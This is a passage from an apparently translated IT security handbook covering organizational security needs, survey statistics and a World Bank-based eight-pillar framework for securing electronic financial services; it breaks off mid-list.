A file that is written to, or read from, the hard disk when a remote website is requested. The website asks for the file to be written on the computer so that it can read it again later. For example, if a website asks you for a username, it can store this information on your disk. When you visit that site again, it reads the earlier cookie and learns what your username was.

Daemon
A small program that is always running on your computer, waiting for you to ask it to do something for you. Such a request is usually made over a network by a remote user.
HTML
HTML is an abbreviation of Hyper Text Markup Language. The language is a set of instructions with which a web browser or e-mail program can display text and images or carry out other operations. An example of instructions in this language:

This sentence is <<Start Bold>> very <<End Bold>> short.

In the sentence above, the words inside << >> indicate an action to be performed. As a result of these instructions, a sentence like the following is displayed:

This sentence is very short.

Part Three: IT Security and Organizations

Chapter 1. Introduction
Chapter 2. Overview of Methods for Mitigating Electronic Security Risks
Chapter 3. Risk Assessment and Loss Analysis
Chapter 4. Planning for Security Needs
Chapter 5. Prevention and Organizational Security Policy
Chapter 6. Personnel Security
Chapter 7. Outsourcing Security
Chapter 8. Privacy Policies, Legislation, and Government Regulation
Chapter 9. Computer Crime
Chapter 10. Mobile Risk Management: E-Finance in the Wireless Environment
Chapter 11. Best Practices: Building a Security Culture
Chapter 12. E-Commerce Safety Rules for All Users and Companies
Chapter 13. International Dialogue on Security

Chapter One: Introduction

As we saw in Part Two, users can do a great deal to protect their computers and the data stored on them. In small organizations, security arrangements may be simple, with everyone responsible for their own computers and files. For larger groups, however, such as organizations that handle commercial transactions or groups that hold confidential data on citizens or customers, the need to establish formal security policies and procedures becomes more important.

When managers and employees consider IT security, whether in commercial companies, non-profit organizations or government institutions, they always face similar issues. Each group needs a certain level of security for its data, clear and simple procedures for staff to carry out, the ability to create and maintain awareness of customers' needs, and an understanding of how to implement security policies in an operational environment. Beyond these general needs, each category of organization also has considerations specific to its own goals and mission. To achieve the goals that have been set, managers must pay close attention to information security policies. Understanding the costs of implementing effective security policies is also very important. Security technologies and procedures are a form of investment and must be evaluated against the costs of potential losses. The practical recommendations of Part Three are presented with an understanding of cost-benefit analysis, which is essential in an environment with limited resources.

Some Statistical Indicators of IT Security in Organizations

Ernst & Young's 2003 Global Information Security Survey shows that 90% of organizations believe information security is very important to achieving their overall objectives. 78% of organizations said that their primary goal in working to secure information is to reduce risk. These organizations included 1,000 wealthy companies that had devoted part of their resources to combating security problems. The survey goes on:

• More than 34% of organizations say they lack sufficient ability to determine whether their systems are currently under attack.
• More than 33% say they are unable to respond appropriately to security incidents.
• Only 34% of organizations claim that they are ready to comply with applicable security regulations.
• 56% of organizations regard insufficient budget as the main obstacle to effective information security.
• About 60% of organizations say they rarely or never calculate return on investment for information security.
• Only 29% of organizations name employee training and awareness as the area in which they have made their largest information security investment, compared with 83% that name technology as their top investment priority in securing information.
• Only 35% of organizations say they have ongoing awareness and training programs for their staff.

These statistics indicate that all organizations, small and large, feel the financial and psychological pressure of IT security threats. The coming chapters of this Part address the priorities and concerns of small and medium-sized organizations. At the same time, it seems useful to keep the results of the Ernst & Young survey in mind as a symbol of the challenges that a number of businesses have faced.

Small and Medium-Sized Businesses [4]

If you are engaged in a small or medium-sized business, your main priorities are profitability, business continuity, stability, and the quality of service to customers. Small and medium-sized organizations are constrained by local, regional or national laws, and depending on the kind of business they do and the business environment of the country in which they operate, they may have to answer to several authorities. In these organizations the security effort will focus on protecting the organization and its customers against fraud and against major, costly attacks on services and systems. In addition to computer crime and network security, data protection is also important for small and medium-sized organizations, and it divides into two main areas: protecting organizational data against spies or organized attackers, and protecting customer data such as credit card and financial transaction data. [5]
[4] The definition of small and medium-sized organizations varies from country to country. In some cases a single owner handles every aspect of a traditional business such as farming or a grocery shop; that is, the owner is the business's only employee. In more complex businesses, several hundred people may work solely on consumer products or technical products. In the developed world, companies that start out relying on technology fall into the small and medium-sized group, but they may receive investment from investor groups, grow quickly, or be bought by large companies. Some very successful small and medium-sized organizations issue shares and themselves become large public companies.

[5] In general, organized espionage is a concern in large companies or in companies that produce products based on new technology, where innovation is highly valuable and may be stolen. For organizations engaged in trade, eavesdropping is a more serious concern than espionage, although the effects of the two are similar. In particular, every company must protect its accounting records, employee information, and credit card transaction information from unauthorized access.

Non-Profit Organizations

In non-profit organizations, managers and staff emphasize influencing the market, cooperating with communities and partner companies, and building a reputation. Systems can be very costly, and because of budget constraints in non-profit institutions they are usually of lower quality. In addition, staff usually have less experience of technical work, so they may run into difficulties when they want to provide continuous service to clients and to present a positive picture of the institution's state and activities to donors, overseers and partner institutions.
Universities

As with non-profit organizations, university systems also face issues such as budget constraints, costly networks, and a wide range of technical skills. Universities may face a number of internal threats, particularly where, for example, students try to break into the university's facilities system to fill their spare time! In addition, universities may operate under uniform policies and may also be required to implement government regulations. Protecting personal data is very important in a university environment, because student files contain important information such as identification numbers, medical records and educational records. Potential attackers can steal, alter or destroy such data, and in doing so seriously damage the university's reputation.

Government Organizations

The implementation and deployment of information technology in government organizations may be assessed on the basis of efficiency, ease of use, and the ability to communicate with other departments and organizations. Since profitability is generally not an issue in government settings, here too, as in non-profit institutions, there is control over the budget, which limits the organization's ability to acquire the latest security hardware and software. At the same time governments must also concentrate on data protection, because their databases contain sensitive information about individuals, such as personal information and medical, criminal and tax records. Unfortunately, even in government organizations in industrialized countries data protection is troubled: it suffers from obsolete systems, inappropriate investment, and worn-out staff who lack the necessary competence in IT security. Like commercial companies and non-profit institutions, government must also care about its public image after any intrusion or other security incident becomes news.
In its recent report on the state of information technology in developing countries, the United Nations Development Program (UNDP) outlined some of the challenges that individuals and organizations face in the information age. [7] The World Bank has produced several series of reports on the development and deployment of information technology. [8] Although the technical experience of organizations in the industrialized world differs in some respects (scale, costs, and staff knowledge base), many lessons can be learned from their strengths and weaknesses in IT security. Large institutions are fewer in number, and each has special capabilities and more extensive financial resources. Even so, tensions still exist among chief security officers as the heads of cost centers, chief financial officers as the controllers of costs, and other branches of the organization (chief information officers, sales and marketing, and products). [9]

[7] See the Human Development Report 2001: "Making New Technologies Work for Human Development" (UNDP: NY, 2001).

[8] For resources, see the World Bank's site and the research projects and results available from the IT Governance Institute (ITGI):
http://www.worldbank.com
http://www.itgi.org

[9] In larger technical companies, or in start-ups that plan to grow quickly, the management team is made up of individuals each of whom specializes in a business or technical area. These roles include (but are not limited to) the chief executive officer (CEO), chief financial officer (CFO), chief technology officer (CTO), chief information officer (CIO), and more recently the chief security officer (CSO). A typical organization also has a series of vice-president positions, such as vice-president of marketing, of sales, and of business development. Since this formal structure is unnecessary (or not feasible) in smaller organizations, it can be very useful to observe how responsibilities are divided in large companies and to note the growing importance of the CSO.

Without an overall plan for creating a secure IT environment, each department may develop its own approach to security, derived from that department's missions, goals and operational objectives, and an approach that suits one department may be of little use to the others. These differing approaches may result in security being over-provided in some areas and under-provided in others, whereas oversight from senior management will ensure that security practices are arranged so that the organization as a whole performs better. The policies and technical implementations required to set up an effective security system for the organization form a necessary and fundamental part of its business objectives, and every organization should value them.

Small and Medium-Sized Organizations: Engines of Growth and Progress

Small and medium-sized organizations have fewer resources for getting started, a flatter management structure, and greater reliance on their staff's knowledge base. In these organizations business processes may be more transparent than those of large organizations, and so in a structure where this much company information is available to all staff, there will be inherent security risks. In organizations that pay no special attention to technology, the organization may be vulnerable to an employee or consultant who is technically stronger than the company's managers. In a company operating at the leading edge of technology, there is a danger that ownership of its innovations and vital resources is not adequately protected against theft or destruction.

To counter these problems, all small and medium-sized organizations should conduct a thorough review of their missions, goals, competencies and information systems. If they operate in areas that may pose security risks to others, for example emerging technologies, they must anticipate likely threats to their customers' security and draw up plans to reduce their impact. If they work in areas related in any way to the security of the state, such as providing telecommunications products and services, they must be aware of when and how they bear legal responsibility for complying with government orders. An Internet service provider (ISP) is an example of a company that faces both kinds of risk. Connecting a customer to the Internet creates security risks for the customer's data and equipment, and by providing digital content and means of communication the ISP becomes subject to national laws and regulations. If e-commerce capability is added to these services, potential threats and assuring compliance with obligations become very large and fundamental problems.

The Dangers of Blended Threats

Statistical data from several reliable sources show a rising trend in the use of malicious code for criminal ends. In 2002 numerous reports concerned such matters: identity theft using malicious code, politically motivated defacement of websites, distributed denial-of-service (DDoS) attacks against specific organizational targets, and similar cases.

In addition, the spread of blended threats on the Internet creates serious risks for everyone. These risks do not belong to any particular area but threaten the entire global network.
For example, the Klez worm was written with characteristics that lead experts to believe it was written either in China or in Hong Kong. Asian countries are currently making increasing use of Internet-connected computers. Unfortunately, many of these computers are unprotected and their users are unaware of the basic principles of safe computer use. As a result, regions with high technical growth, such as China, are likely to come under attack from attackers around the world through the spread of viruses, worms, Trojans, and blended threats that combine all of these elements.

Current software tools provide a range of protections against malicious code but are incapable of a complete defence against all forms of attack. Using a layered defence, both technical and human, greatly reduces the risk of security incidents caused by malicious code, although it still does not eliminate it. Blended threats such as Code Red, Slammer, Klez and Bugbear can plague computer networks continually. Many worms have no destructive effect in themselves, but they install traps in the system that give people who are familiar with those traps quick and easy access to the network.

Apart from this, worms are in some respects more effective at disabling systems, because they are able to exploit vulnerabilities in common software such as web browsers.
In computing environments with such characteristics, users must increase their knowledge of the risks that exist and of how to respond appropriately in individual situations. When safe computer use is practised, the risk of an attack can be reduced considerably, but it must be stressed again that it can never be reduced to zero. Since the threat of deliberate sabotage of computer systems is very great for organizations, it is very important to examine the risks to personal security and financial transactions and the new challenges arising in wireless computing environments.

Advantages of Information Technology and Its Management

Despite the challenges, managers and entrepreneurs in the public and private sectors of developing countries are investing in new information and communication technologies, including e-mail, the Internet, wireless communications and business software, to help with their day-to-day work. The various benefits of using these new products and services, such as efficiency and cost savings, are clear:

1. Business communication with customers, vendors and partner companies improves;
2. The ability to access large volumes of information quickly and cheaply is strengthened;
3. A means is provided for developing data protection and management capabilities, leading to better upkeep of data items for financial managers, better analysis of customer behaviour for marketing and sales managers, and more accurate statistics for production line managers.

However, as we have seen, these improvements are not without risk, and this is true both of physical assets and of assets that are less visible. This Part examines the IT security concerns faced by large and small companies in developed and developing countries. The different sections of this Part are designed with particular attention to what executives, managers and staff must do to protect the systems, customers, vendors and other stakeholders of the company. The checklists and procedural notes can easily be used by a government or non-profit organization as well.

In addition to internal procedures and policies, some small and medium-sized organizations may decide to outsource their security needs. In the industrialized world some experts say that outsourcing non-core services such as IT security will remain a strategy for companies for at least the next ten years. In addition, some organizations have a particular interest in meeting global security needs, especially those of developing countries. For example, the Information Systems Audit and Control Association (ISACA) has business partners in 60 countries and freely provides the text of various programs from different countries. [16] ISACA also proposes a control and audit framework for organizations and provides checklists for the use of outside resources.

[16] COBIT (http://www.isaca.org/cobit.htm) provides a framework of suitable electronic security resources for use by managers, users, information security audit and control staff, and security professionals. Getting in touch with ISACA will give you a good view of the association's current and future activities. To learn about the association's future programs, visit its site at http://www.isaca.org. This study has made Uruguay a country of interest for study by readers of this book (1): http://www.isaca.org/ct_case.htm

Whether these systems are acquired inside the organization or outside it, developing and supporting security infrastructure, policies and procedures will, for most companies, be nothing other than striking a balance among criteria. Executives, managers and policymakers must pay attention to risks and, by defining formal goals and the organization's minimum growth, set a measure and standard for balancing investment in security. Once the organization has reached a desirable level of security, management must not forget the importance of keeping systems up to date and of regular audits of the security plan. Changes to computers and network equipment, for example of the kind peculiar to open-source software packages, require a full review of the detailed security plan. In short, security is more an art than a science, and ensuring that it works successfully in organizations requires the thinking and cooperation of a large number of creative minds in the community. [18]

[18] Because of the increase in security incidents around the world, a number of consulting firms have produced reports on information technology and its global effects. See, for example, Ernst & Young's 2003 Global Information Security Survey: http://www.ey.com/global/download.nsf/US/TSRSGlobal_Information_Security_Survey_2003_/$file/TSRS_Global_Information_Security_Survey_2003.pdf

Chapter Two: Overview of Methods for Mitigating Electronic Security Risks [19]

Overview: Security in Electronic Financial Services

In several recent papers, electronic security was presented as a vital issue in enabling electronic financial services (e-finance) to meet the expectations of organizations and customers and to deliver the benefits of technology. [21] Electronic security touches the heart of the new global economy, because the potential benefits of the markets of the international community are very significant, and the best use cannot be made of these markets without securing the electronic environment. In any case, the course of the global economy calls for a deep discussion of modern commerce and policymaking: How should privacy be defined and protected? What do trust and confidence mean in a digital environment? How can an appropriate level of security be determined? And finally, how should return on investment (ROI) be measured for security investments?

[19] This chapter was written with the help of a report prepared for the World Bank in 2002 by Thomas Glaessner, Tom Kellerman and Valerie McNevin: "Electronic Security: Risk Mitigation in Financial Transactions": http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&ESecurity/E-Finance&Publications

[21] For further information on the work of Glaessner, Kellerman and McNevin, see among others the following book: "Electronic Safety and Soundness: Securing Finance in a Digital Age, Public Policy Issues" (October 2003). This monograph is the culmination of efforts over the past three years that have resulted in several papers. Other papers in the series include "Electronic Security: Risk Mitigation in Financial Transactions" (May 2002, June 2002, July 2002), "Electronic Finance: A New Approach to Financial Sector Development?" (2002), and "Mobile Risk Management: E-Finance in the Wireless Environment" (May 2002), all of which are available at http://www.worldbank1.org/finance

This chapter of the book identifies, defines and discusses an eight-pillar set of policies and procedures, together with an overall infrastructure, for strengthening a secure electronic environment for the financial services sector. It is written for policymakers who work with financial service providers, especially executives, chief information officers and chief security officers. The technical points in this Part will be very useful to those who run electronic security systems, to bank examiners who assess the effectiveness of electronic security, and to those who deal with the inherent, day-to-day risks of electronic transactions.

Because of the ever-changing nature of technology, this book not only does not go into the details of all these topics, but for some of them does not even give general answers. Instead it gives a quick overview of what has happened so far in the world of security, of the gaps that are emerging in electronic security, and of some possible ways of narrowing those gaps, and it also points to some of the activities under way around the world to address these concerns.

What Is Electronic Security?

In general, electronic security is any tool, technique or process used to protect the information assets of a system. Electronic security increases the value of a network and consists of soft and hard infrastructure. Soft infrastructure comprises the policies, processes, protocols and guidelines that prevent the system and data from being misused. Hard infrastructure consists of the software and hardware needed to protect the system and data against security threats from inside and outside the organization. Note that the level of electronic security for any activity should be proportionate to the value of that activity; security for important transactions and dealings should therefore be provided at a higher level than for ordinary ones.

Since a new technology also brings new risks, and technologies are becoming more widespread every day, electronic security deserves greater attention.
E-finance is the use of electronic means to exchange information, to transfer signs and credit instruments, and to conduct transactions in a commercial environment. E-finance consists of four basic components:

• electronic funds transfers (EFTs) [24];
• electronic data interchange (EDI) [25];
• electronic benefits transfers (EBTs) [26]; and
• electronic trade confirmations (ETCs) [27].

24. Electronic Funds Transfers
25. Electronic Data Interchange
26. Electronic Benefits Transfers
27. Electronic Trade Confirmations

Although e-finance offers developing markets a great opportunity to expand commerce, it also brings several serious risks. All four components of e-finance are susceptible to fraud, theft, embezzlement and tampering. Most commercial crimes committed on the Internet are not particularly new (fraud, theft, impersonation and extortion have plagued the financial services industry for years), yet technological progress keeps creating new dimensions, and this can widen the depth and scope of the crimes. Technology allows very large and complex crimes to be carried out quickly and anonymously. In the past, stealing 50,000 credit cards would have taken even highly organized criminals months or years; today a single offender, using free tools found on websites, can break into an identity database and steal the same number of credit cards in just a few seconds.

Recent studies estimate that 57% of intrusion attacks in the United States last year originated in the financial sector. Many breaches, such as a serious one at the US Treasury Department, resulted from errors in implementing risk assessment processes and from deploying off-the-shelf commercial software without layered security approaches, such as personnel policies, communication guidelines, and regular updating of the technical tools in use, such as virus scanners [28] and firewalls [29].
The consequences of these security breaches, news of which also reached the media, ranged from loss of reputation and financial standing at one end to a latent change in customers' behavior toward electronic transactions at the other; and the sole cause of all this was customers' lack of trust in the intermediaries of e-commerce and e-finance.

The networked economy creates different opportunities, both for creating wealth and for committing theft and destruction. In weighing the advantages and disadvantages of this process, policymakers and decision makers must increase their awareness of the role e-security plays in ensuring reliable commercial transactions.

The e-security industry is growing and globalizing; it therefore raises public policy challenges in the areas of competition policy, potential conflicts of interest, and certification.

In the recent past, companies providing e-security services generally operated in three areas: access, use, and assessment. Beyond these, today's industry includes companies that offer other services in this field as well: monitoring and filtering of data, intrusion detection, firewalls, penetration tests to gauge the vulnerability of software and hardware, encryption software, and authentication services based on passwords, tokens, keys or biometrics, all of which verify the identity of parties or the integrity of data.

In addition to e-security, many vendors also carry a considerable share of the communications among e-finance providers in different countries. These companies include hosting companies [30], ISPs and financial service providers. In new markets, telecommunication companies usually act as the key providers of short-wave, satellite and mobile telephone services. These companies may also provide hosting services, money transfer services and, in some cases, e-security infrastructure services.

28. Virus Scanners
29. Firewalls
Ownership in the e-security and e-finance industries raises complex questions about competition policy and potential conflicts of interest. On competition policy one may ask: can the multiple roles of telecommunication companies lead to the prevention of competition, particularly in emerging markets, where they usually have at their disposal the technical specialists needed to provide these services? Or: how are the integrity of the services provided and the company's policies on accurate and prompt reporting of security breaches to be ensured? In addition, the trend toward outsourcing to third-party companies highlights the importance of redefining the scope of responsibilities, from the top of the responsibility pyramid, in an industry with such a complex set of vendors. In contracts between financial institutions and their service providers, part of the service contract fee is usually used as a performance guarantee, but even so, the performance of the work done has not been adequately addressed from a security standpoint.

In e-security regulation of the financial services industry, the public interest must be taken into account. In e-security, a reasonable balance must be struck between privacy and issues such as cost, quality of service, and innovation, and special attention must also be paid to this balance when drafting rules and policies.

The telecommunications industry was traditionally regarded as essential to public welfare, comfort and health, and so a core component of its regulation was the expansion of services for public access. Today, however, access to basic electronic services is also considered a necessity of life in many countries. Historically, the financial services industry has been regulated on the reasoning that trust and confidence are of the highest importance in the orderly transfer of goods and money; and since financial institutions depend on the public's trust, they must conduct their business in a sound, rational and prudent manner. As the telecommunications industry and the financial services sector converge through the Internet, the importance and necessity of informed public policy and regulation grow by the day, to ensure that government, businesses and the public can continue to use secure financial services.

In preparing public policies to create or reform e-security measures, eight important pillars must be considered:

• an adequate legal and enforcement framework;
• technical and managerial arrangements to ensure the e-security of payment systems;
• strong supervision and prevention, to create better incentives for implementing appropriate, layered risk-management systems, including e-security, for financial service providers;
• a framework in which private insurance companies can insure against electronic risks and, alongside this, raise the standards of the field by creating financial obligations for reimbursement;
• digital signatures;
• information sharing;
• education of citizens, staff and management on security issues; and
• a layered security structure.

30. Hosting Companies

Pillar One: Legal and Enforcement Framework

Countries in which e-banking or other e-finance services (such as the distribution and trading of securities) take place must address their e-security issues at the same time as they develop laws, policies and practices. They must provide security to protect electronic operations and amend their criminal laws to cover this type of crime.

In developing the policy and legal framework for e-finance, the following topics must be considered:

• electronic transactions and e-commerce;
• payment systems security;
• privacy;
• cyber crime;
• anti-money laundering; and
• enforcement infrastructure.

Taken together, these six areas of policy, law and enforcement must address first the basic relationships among all stakeholders and then the transactions that flow through payment systems. One of the most important components of an adequate legal framework for e-finance is recognition of the legal validity of electronic signatures, transactions, and customer records.
The legal framework should favor technical solutions, provide protection for customers conducting electronic transactions, and promote internal operability.

Electronic transactions

An electronic transactions law should state what is meant by an electronic signature, record or transaction, and thereby establish the legal validity of each element. These policies must be very precise, especially in defining the electronic signature. As far as possible, the definitions should have technical characteristics, so that different solutions can enter the market.

Payment systems security

In preparing a policy for payment systems security, all components that directly affect the system must be considered. All of these components must operate securely in order to protect the integrity and reliability of the systems. In addition, having a policy in this area makes it possible to produce accurate and valuable reports on all electronic financial losses, attacks and damage. The mere existence of a security policy means that the financial institution and its managers have probably taken the necessary measures against risks.

Privacy

A privacy law should cover the protection and use of data, consumer protection and other related business requirements, and should declare the organization's policies on the use of information. The European Union continues to lead in protecting the privacy of its citizens under the Data Protection Directive (adopted in 1995). At a minimum, a privacy law should include the principles of fair information use (including notice, choice, access, and the minimum information necessary to complete the transaction).

Cyber crime [31]

Every country should have laws on the misuse of networks and computers that causes serious damage to the networks and computers themselves and many other harms. The law should also specify the tools and resources needed for investigation and prosecution, as well as the punishment of those who commit cyber crime. An example of such laws and guidelines can be found in Europe's Convention on Cyber Crime [32], which is discussed in detail in Chapter Four. [33]
Anti-money laundering

Policies should define methods for combating money laundering and should encourage the international community to cooperate in investigating, prosecuting and punishing such crimes, in order to reduce the threats posed by money laundering, which has spread to new technologies as well.

Enforcement

It can perhaps be said that the need to enforce e-security laws within a country's borders is as important as the existence of the legal framework itself. Many kinds of computer attacks have originated in countries with weak legal and enforcement regimes for e-security, and this makes the need for mechanisms of international cooperation more apparent than ever.

Pillar Two: E-Security in Payment Systems

Regulators must consider how to extend supervision and enforcement to electronic means of transfer. The first reason most people give for not using electronic means of transfer is the fear that information is not adequately protected. Proper protection can increase consumer confidence and strengthen market discipline, and so pave the way for greater use of electronic financial systems.

Pioneers of regulation

Payment systems are an important part of any financial system. Policies developed to reduce the risks of payment systems should offer a solution for the following five items:

1. definition of money transmitters;
2. reporting requirements;
3. regulation;
4. warranties, indemnification, and liability; and
5. security requirements for service providers.

Definition of a money transmitter

A money transmitter is any business organization engaged in the transfer and exchange of currency and monetary instruments. These organizations are usually engaged in the "money services business" and act as third-party automated clearinghouses [34]. [35] In examining the security of the electronic payment system, regulators must recognize that a new pattern for the movement of money has emerged in complex IT environments. The considerable volume of money that flows around banks, rather than through them, has a significant effect on the global payment system, on monetary policies, and on economic forecasts.

Reporting requirements

Failure to report security incidents, especially in financial services, increases the likelihood that those who use payment systems without the necessary review and precautions will persist in unsafe and unsound practices and so incur further losses. One solution may be to place the duty of reporting incidents on executive officers. [36]

Warranties and indemnification

Financial institutions can make after-sales service and indemnification mandatory for companies that produce software and hardware. They can also require companies to supply products that are resistant to the damage that may arise from hardware and software security holes. Organizations that supply such services or products to the financial services industry use stronger protection standards and consider themselves obliged to state when their product has not been configured for, or is not suitable for, use in a particular sector. One solution for all of these cases is to attach a disclaimer note [37] to the software or hardware stating that the product must not be used to create, transmit or store unauthorized, sensitive or confidential information, and that otherwise its producer bears no liability.

31. Cyber Crime
32. Europe's Convention on Cyber Crime
33. Council of Europe Convention on Cyber Crime: http://conventions.coe.int
34. Third-Party Automated Clearinghouse
35. These services may also include requests to receive and transfer money, conversion of capital, and other similar items.
36. Especially chief information officers and information security managers.
37. Disclaimer Note
Standards for service providers

Providers of services to the financial services industry can apply a stronger standard than suppliers of services that are not directly connected with this industry. It is stressed once again that even when this is done, there is still a long way to go before confidence and trust are established.

Liability

The legal and regulatory framework can create incentives for hosting companies, application service providers, software and hardware vendors, and e-security providers to be accountable to the financial services industry.

Pillar Three: Supervision and Prevention Challenges

Capital requirements

The new Basel [38] guidelines on capital, especially those relating to operational threats, have not addressed the reputational risk or the strategic risks of e-security vulnerabilities. This raises a question: when information on security incidents is inaccurate and damage to reputation is hard to assess, what is the best way to measure a bank's operational risks? On the matter of determining the capital required for e-security risks, one effective method may be to use an examination process to identify and remedy electronic security breaches, together with stronger incentives for reporting such incidents. [39] In addition, authorities can encourage or require financial service providers to insure themselves against certain aspects of electronic risks that are not covered by the existing policy framework (such as denial of service or identity theft). As the private insurance industry has become more active in this area, this approach looks increasingly practical, and it can contribute to the overall health of the insurance industry and of its structure in emerging markets. [40]

38. Basel
39. See item 6 of this executive summary.

Supervision and examination processes

Beyond controlling payment systems and supervising money transmitters, revising the legal, supervisory and preventive guidelines may be useful for ensuring the security of financial service providers. This applies in particular to businesses that are active in e-banking or in providing other Internet financial services.
The Basel Committee's Electronic Banking Group (EBG) on banking supervision [41] was formed to make recommendations on extending, changing or amending supervision and examination as needed to adapt procedures to new technologies. In 2001 the EBG published risk management principles for electronic banking, which included specific principles setting out standards for validation and authentication, internal controls, the integrity of asset security, and the integrity of e-banking information. The fields of supervision and examination will undergo a major change of direction in the next few years. Just as the security industry went through a paradigm shift with the introduction of, and mass reliance on, personal computers and the Internet, banking supervision also appears set to experience a shift in the center of gravity of the financial services industry.

Coordination among domestic and foreign agencies

A key issue facing most countries is the need to improve the exchange of information between regulators and law enforcement agencies (police forces). Many countries have several agencies that collect important information, but the information is usually not shared among these agencies or with foreign agencies (sometimes for legal reasons). The subject of information exchange among agencies at the national and international levels is beyond the scope of this book. In any case, as governments try to combat the crimes found in the electronic environment, information sharing and international cooperation are key topics in this discussion.

40. In many emerging markets the insurance industry itself may need to be restructured and brought to a stable state; in any case, these conditions too can be prevented.
41. Banking Supervision's Electronic Banking Group

Pillar Four: The Role of Private Insurance as a Complementary Monitoring System

Although liability insurance for e-commerce and electronic risks is still in the early stages of development, it involves problems relating to the first party and the third party.
The costing of cyber risks needs to develop further, but to achieve this the insurance industry must have more information about security breaches and the risks associated with them. For example, in the experience recorded so far with this type of insurance, not enough attention has been paid to the new risks that wireless technologies have created for financial services. Insurance providers can require that e-security standards for wireless technology be identified and used, so that these risks will already have been reduced before organizations are forced to comply with electronic risk policies.

The global insurance industry can serve as an important force for changing e-security requirements. First, it can improve minimum e-security standards in the financial services industry. For example, the global financial services industry can prompt companies to use layered e-security as a prerequisite for doing business. Second, insurance companies can ask financial service institutions to turn to vendors that use approved, industry-accepted standards in providing e-security services, so that potential risks are reduced. Third, insurance companies can encourage regulators to require financial service institutions to improve the quality of information and reports on incidents, so that better analysis of electronic risks and return on investment becomes possible. Finally, the insurance industry can publish solutions in which matters such as risk sharing and liability for security breaches are made mandatory among e-security vendors and other companies active in this field (such as hosting companies).

The agencies that supervise financial services are still developing regulatory standards. Because of the inherent difficulty of supervising complex transactions that rest on changing technical infrastructure, finding complementary solutions for risk management is very important. Despite the deficiencies in the information needed to estimate the damage caused by electronic risks, the insurance industry has been playing a role in this area for some time. It is predicted that in the next few years, in the US market alone, the growth of liability insurance for e-commerce and the scope of its risks will reach 2.5 billion dollars a year.

Pillar Five: Certification [42], Standards, and the Role of the Public and Private Sectors

The public and private sectors should work together to develop standards and to harmonize certification and accreditation schemes. The two topics addressed here are the certification of e-security service providers and the certification of the elements of each transaction.

42. Certification

One possible approach to securing e-finance is for regulators to require vendors that directly affect the payment system to obtain a license. Another approach is to require the industry to accredit and certify e-security service providers. For example, a certification titled "security professional" has recently been created in the security industry. In effect, by providing a structure the consumer can recognize, accountability between the industry and its professionals, and a separation of certified professionals from those who merely regard themselves as professionals, this development benefits the whole industry. The approach also raises the standing of the security field to that of a professional field and gives the industry the incentive it needs to develop and enforce standards.

The next area to be considered is the certification of transaction elements such as the electronic signature. Certification can increase the value of a transaction, depending on who and what has certified it. A certificate may be issued by a government agency such as the post office or by a private organization such as a bank. Each of these cases has its own structural and governance issues. In many countries, private companies may do better at providing the information infrastructure needed for certification.
The essential element of a successful certification program is that the structures existing in different jurisdictions use the same characteristics to certify all transactions, and that the scope of a certifier's authority and responsibilities is consistent and comprehensive across all jurisdictions.

Although public key infrastructure (PKI) [43] technology and certification are usually regarded as the only acceptable ways of providing security, attention must also be paid to the costs and the complex, convoluted structures of PKI and to its legal incompatibilities with certification authorities (CAs) [44]. For a solution to be reasonable and appropriate, it must be workable within boundaries such as trust and liability, and it matters little which technology is used to achieve this.

43. Public Key Infrastructure
44. Certification Authorities

Pillar Six: Accuracy of Information on Security Incidents, and Public-Private Cooperation

The lack of accurate information on e-security incidents is the result of a lack of knowledge or of incentive to capture, measure and share information. As domestic and cross-border arrangements expand to make it easier for financial service providers to share accurate information about denial-of-service attacks, theft, fraud and the like, e-security will be strengthened around the world. Failing to share information not only keeps knowledge at a fixed level but, more importantly, can also limit the development of private-sector solutions (including insurance). This lack of information may increase the cost of insurance for companies and financial service providers.

Broader cooperation between government and the private sector is needed in this area. For example, by establishing the Financial Services Security Laboratory, BIST's Security and Risk Assessment Steering Committee [45] examines topics such as security, the soundness and integrity of payments, e-commerce, and related technologies. The laboratory also facilitates the exchange of information on security issues in the financial services industry.
In addition, the existence of the Internet Security Alliance [46], the Incident and Response Security Teams [47], and the Computer Emergency Response Team (CERT) [48] in various countries shows that mutual cooperation leads to growing information sharing between law enforcement and the private companies that provide financial services. A common element of all these programs is respect for confidentiality and trust: law enforcement and educational institutions do not disclose the identity of the sources of their accurate information. The role of multilateral organizations in facilitating cooperation in this area needs to be examined.

It is obvious that the more integrated the economy becomes, the more important it is that each sector discharges its responsibility in the best possible way; yet today's financial services industry started out as a centralized system, and it is the technological changes of the past decade that have extended and increased the interdependencies of this system.

Pillar Seven: Education and Prevention of E-Security Incidents

Statistical analysis shows that in many countries more than 50% of e-security attacks on organizations are carried out by people inside the organizations. A poorly educated workforce is more vulnerable to Internet attacks. Conversely, a trained workforce that is aware of security issues can add an effective layer of protection to the system.

Initial educational measures should be considered for financial service providers, including the managers and system administrators who are engaged in supervision and enforcement in various organizations, and also for Internet users of financial services. The initial measures include the following:

• raising awareness and educating people in the financial sector about ethics on the Internet and proper user conduct on networked systems;
• developing organization-level e-security policies on matters such as proper conduct and the channels available for reporting attacks or incidents, in full coordination with all the efforts under way to complete global information about attacks;
• raising the awareness of the banking communities of emerging markets about the need for incident response plans [49] for cases in which an incident occurs;
• facilitating cooperation and knowledge transfer among law enforcement, financial intelligence units [50] and supervisory agencies in developed and emerging markets, using tools such as programs for the active exchange of information among staff;
• designing focused courses for examiners with the help of the Financial Stability Institute [51] or other training centers; and
• developing a multi-purpose university program to educate the e-security professionals of the future and, at the same time, raise the level of knowledge of users of Internet financial services.

Pillar Eight: Layered Security

There are twelve core layers of security that count as fundamental components of a proper plan for preserving data integrity and reducing the risks of open-architecture environments. This twelve-layer chain explains which security mechanism should be used in each situation; it also states that the security of any network is only as strong as the weakest element of that network. The details of this twelve-layer security plan are given at the end of this part.

Caveats

Parts Three and Four of the book deal with environments that are taking shape rapidly and that try, through a disciplined approach, to bring economics, law and technology into line with one another. Because of its rapid global growth, e-security has a mysterious form. Most countries, including those with more experience of security issues, still have little knowledge in this area, and emerging markets know even less. This book pays more attention to the lessons of the United States, because that country was the birthplace of the Internet, has had more time to experience its advantages and disadvantages, and also created the initial standards in this field. [52] In preparing this book, attention has also been paid to the activities and experiences of the economically advanced countries of Europe, Asia and South America. Obviously, much more could be said on topics such as "the particular problems of emerging markets in this arena" and "the legal foundations and organizational agreements needed to improve e-security worldwide".

Without these activities, the great potential of the companies that have adapted themselves to e-commerce will be put at serious risk, because the trust and confidence of those in the market will be seriously affected. The following chapters of this part pursue these items:

a) methods for risk evaluation and loss analysis;
b) practical guidance on developing security policies and procedures that suit an organization;
c) general and specific recommendations for managers and employees on e-security best practices; and
